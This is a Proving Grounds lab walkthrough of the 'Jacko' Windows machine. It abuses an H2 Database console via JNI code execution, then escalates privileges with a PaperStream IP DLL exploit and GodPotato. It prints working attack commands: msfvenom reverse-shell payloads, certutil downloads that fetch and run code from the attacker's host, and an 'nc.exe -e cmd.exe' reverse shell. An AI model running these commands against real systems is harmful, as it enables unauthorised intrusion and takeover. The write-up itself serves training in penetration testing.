PG - Jacko

PG – Jacko

In this walk through, we will be going through the Jacko room from Proving Grounds. This room is rated as Intermediate on the platform and it consist of exploitation of running H2 Database instance via JNI Code Execution. For privilege escalation, we have two routes, either exploit PaperStream IP particular version or use Potato Exploits to get root. So, let’s get started without any delay.

Jacko

Machine Info:

TitleJacko
IPaddress192.168.229.66
DifficultyIntermediate
OSWindows
DescriptionJacko is an Intermediate level Windows machine which is vulnerable to JNI Code Execution in running H2 Database instance. The privilege escalation has two routes, either exploit PaperStream IP particular version or use Potato Exploits to get root.

Enumeration:

  • I started off with a regular aggressive nmap and full TCP port scan. Found multiple ports opened on the target but the interesting one includes – 80 (HTTP), 139,445 (SMB), 8082 (HTTP).

$ sudo nmap -A 192.168.229.66
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-12 19:11 IST

Nmap scan report for 192.168.229.66
Host is up (0.17s latency).
Not shown: 994 closed ports
PORT     STATE    SERVICE       VERSION
53/tcp   filtered domain
80/tcp   open     http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: H2 Database Engine (redirect)
135/tcp  open     msrpc         Microsoft Windows RPC
139/tcp  open     netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open     microsoft-ds?
8082/tcp open     http          H2 database http console
|_http-title: H2 Console
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=2/12%OT=80%CT=1%CU=43781%PV=Y%DS=4%DC=T%G=Y%TM=65CA206
OS:6%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=108%TS=U)OPS(O1=M54ENW8NNS%
OS:O2=M54ENW8NNS%O3=M54ENW8%O4=M54ENW8NNS%O5=M54ENW8NNS%O6=M54ENNS)WIN(W1=F
OS:FFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M
OS:54ENW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T
OS:4(R=N)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y
OS:%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=5378%RUD=G)IE(R=N)

Network Distance: 4 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-02-12T13:42:48
|_  start_date: N/A

TRACEROUTE (using port 5900/tcp)
HOP RTT       ADDRESS
1   169.79 ms 192.168.45.1
2   169.76 ms 192.168.45.254
3   170.60 ms 192.168.251.1
4   170.59 ms 192.168.229.66

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.07 seconds

nmap scan

sudo nmap -sS -p- -T5 192.168.229.66

all port scan

  • Enumerated the web application on port 80 reveals a H2 Database Engine welcome page.

H2 Database Engine

  • Next, accessed the web server running on port 8082 reveals a login panel for the H2 Database Engine.

H2 Database Engine login

  • I tried the blank password on default username and it logs me in.

H2 Database Engine backend

  • We are now prompted with a SQL statement input field. I used the below SQL statement to test if we can read the contents of the /etc/hosts file in Windows and it worked.

SELECT FILE_READ('C:/WINDOWS/System32/drivers/etc/hosts',NULL);

/etc/hosts file

Initial Access:

  • I looked online for any known exploits related to the running H2 Database version and found a JNI Code execution exploit. I used the commands listed in the below exploit and got a successful command execution on the target.

Exploit: https://www.exploit-db.com/exploits/49384

Using the exploit

JNIScriptEngine.dll

jacko\tony

  • Next to leverage the code execution into a full-blown shell. We first have to create a reverse shell binary using msfvenom.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.166 LPORT=8082 -f exe > revshell.exe

creating a payload

  • Now, we will download the payload on to the target using Certutil.

CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil.exe -urlcache -f http://192.168.45.166:8000/revshell.exe c:/windows/temp/revshell.exe").getInputStream()).useDelimiter("\\Z").next()');

download the payload on to the target

setting up the HTTP server

  • At last, execute the payload using the below command. This will grant us a reverse shell back at our netcat listener.

CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c C:/Windows/Temp/revshell.exe").getInputStream()).useDelimiter("\\Z").next()');

executing the payload

got initial access

  • Captured the local flag on user Tony’s Desktop.

local flag

  • The shell is a little clumsy. Stabilize it using the below powershell one liner.

set PATH=%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\system32\windowspowershell\v1.0\;

whoami

Privilege Escalation:

  • Further, i looked into the installed application on the target. Found an interesting one – PageStream IP.

dir C:\Program Files (x86)

PaperStream IP

  • I looked inside the application folder and peeked into readmeenu.rtf file that gives me the version of the PaperStreamIP running.

cd TWAIN

type readmeenu.rtf

PaperStream IP driver 1.42

  • I looked online for any known exploit and found a local privilege escalation exploit related to that. I performed the setup as required by the exploit. Downloaded the DLL to the target and executed the exploit however it didn’t grant me shell. Strange!

Exploit: https://www.exploit-db.com/exploits/49382

msfvenom -p windows/x64/shell_reverse_tcp -f dll -o UninOldIS.dll LHOST=192.168.45.152 LPORT=445

creating the DLL file

certutil.exe -urlcache -f http://192.168.45.152:8000/UninOldIS.dll C:\Windows\Temp\UninOldIS.dll

certutil.exe -urlcache -f http://192.168.45.152:8000/49382.ps1 c:/Users/tony/Desktop/49382.ps1

executing exploit.ps1

  • As per my previous enumeration, i knew that the current user has SEImpersonate Privilege set which makes it a contender for Potato Exploits. I used below God Potato Exploit on it.

God potato Exploit – https://github.com/BeichenDream/GodPotato/releases

  • Downloaded the exploit on to the target and executed it with netcat to give me a reverse shell at my listener on port 4444.

certutil.exe -urlcache -f http://192.168.45.152:8000/GodPotato-NET4.exe c:/Users/tony/Desktop/Godpotato.exe

certutil.exe -urlcache -f http://192.168.45.152:8000/nc.exe c:/Users/tony/Desktop/nc.exe

Godpotato.exe -cmd "nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.152 4444"

Firing Godpotato exploit

  • Got the connection back as Administrator. Finally, captured the root flag and marked the machine as complete.

got root

proof flag

Also Read: PG – InsanityHosting

Conclusion:

Conclusion

So that was “Jacko” for you. We started off with a regular nmap scan and found multiple ports opened on the target but the interesting one includes – 80 (HTTP), 139,445 (SMB), 8082 (HTTP). Enumerated the web server running on port 8082 which reveals a login panel for the H2 Database Engine. Tried the blank password on default username and got logged in. Looked online for any known exploits related to the running H2 Database version and found a JNI Code execution exploit. Used the same to get initial access on the target. For privilege escalation, we had two routes, either exploit PaperStream IP particular version or use Potato Exploits to get root. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top